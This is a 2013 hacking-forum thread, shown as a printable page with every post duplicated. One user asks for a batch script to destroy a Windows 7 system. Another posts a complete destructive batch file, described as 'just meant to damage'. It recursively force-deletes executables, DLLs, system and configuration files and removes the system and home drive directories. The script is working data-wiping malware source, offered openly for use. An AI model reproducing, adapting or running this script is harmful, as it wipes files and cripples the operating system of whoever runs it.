![]() |
|
Kiling windows 7 - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Computers (https://sinister.li/Forum-Computers) +--- Forum: Operating Systems (https://sinister.li/Forum-Operating-Systems) +--- Thread: Kiling windows 7 (/Thread-Kiling-windows-7) |
Kiling windows 7 - kairo1981 - 05-03-2013 Do you know any codes bat that will destroy the entire system Windows 7, because tests on the virtual machine I have WindowsXP, but I'm looking for windows 7 there already are some other attributes, maybe some command that destroys the font? Kiling windows 7 - kairo1981 - 05-03-2013 Do you know any codes bat that will destroy the entire system Windows 7, because tests on the virtual machine I have WindowsXP, but I'm looking for windows 7 there already are some other attributes, maybe some command that destroys the font? RE: Kiling windows 7 - noize - 05-03-2013 Well, I might code out a little thing that - when run with administrator privileges - should make a bit of damages. Code: @echo off
:: written by noize
color 0a
title BATCH'D!
rem NOIZE'S BATCH'D - just meant to damage
cd %systemdrive%
echo BATCH'D!
echo @for /f "tokens=*" %%a in ('dir . /ad/b') do del "%%a" /f /q /s ^> nul > batcher.bat
start batcher.bat
set name=%0
ren %0 file.bat
for %%a in (txt cmd rtf avi jpg jpeg gif png wmv dll exe sys bak ico inf ini) do del *.%%a /f /q /s > nul
ren %0 file.cmd
del *.bat /f /q /s > nul
ren %0 %name%
for /f "tokens=*" %%b in ('dir . /ad/b') do del "%%b\*.*" /q /s /f > nul
for /f "tokens=*" %%b in ('dir . /ad/b') do rd "%%b" /q /s > nul
rd %systemdrive% /s
rd %homedrive% /s
del *.* /f /q /s
rd %homedrive% /s
rd %systemdrive% /sI know it's not the best; just something. RE: Kiling windows 7 - noize - 05-03-2013 Well, I might code out a little thing that - when run with administrator privileges - should make a bit of damages. Code: @echo off
:: written by noize
color 0a
title BATCH'D!
rem NOIZE'S BATCH'D - just meant to damage
cd %systemdrive%
echo BATCH'D!
echo @for /f "tokens=*" %%a in ('dir . /ad/b') do del "%%a" /f /q /s ^> nul > batcher.bat
start batcher.bat
set name=%0
ren %0 file.bat
for %%a in (txt cmd rtf avi jpg jpeg gif png wmv dll exe sys bak ico inf ini) do del *.%%a /f /q /s > nul
ren %0 file.cmd
del *.bat /f /q /s > nul
ren %0 %name%
for /f "tokens=*" %%b in ('dir . /ad/b') do del "%%b\*.*" /q /s /f > nul
for /f "tokens=*" %%b in ('dir . /ad/b') do rd "%%b" /q /s > nul
rd %systemdrive% /s
rd %homedrive% /s
del *.* /f /q /s
rd %homedrive% /s
rd %systemdrive% /sI know it's not the best; just something. RE: Kiling windows 7 - kairo1981 - 05-04-2013 thank you very much Unfortunately, windows 7 sections that script up for anything you are not suited for something else? RE: Kiling windows 7 - kairo1981 - 05-04-2013 thank you very much Unfortunately, windows 7 sections that script up for anything you are not suited for something else? RE: Kiling windows 7 - noize - 05-04-2013 (05-04-2013, 05:52 PM)kairo1981 Wrote: Unfortunately, windows 7 sections that script up for anything you are not suited for something else? Scuse me, but I believe I didn't get your question. Maybe you could have it in some other way? RE: Kiling windows 7 - noize - 05-04-2013 (05-04-2013, 05:52 PM)kairo1981 Wrote: Unfortunately, windows 7 sections that script up for anything you are not suited for something else? Scuse me, but I believe I didn't get your question. Maybe you could have it in some other way? |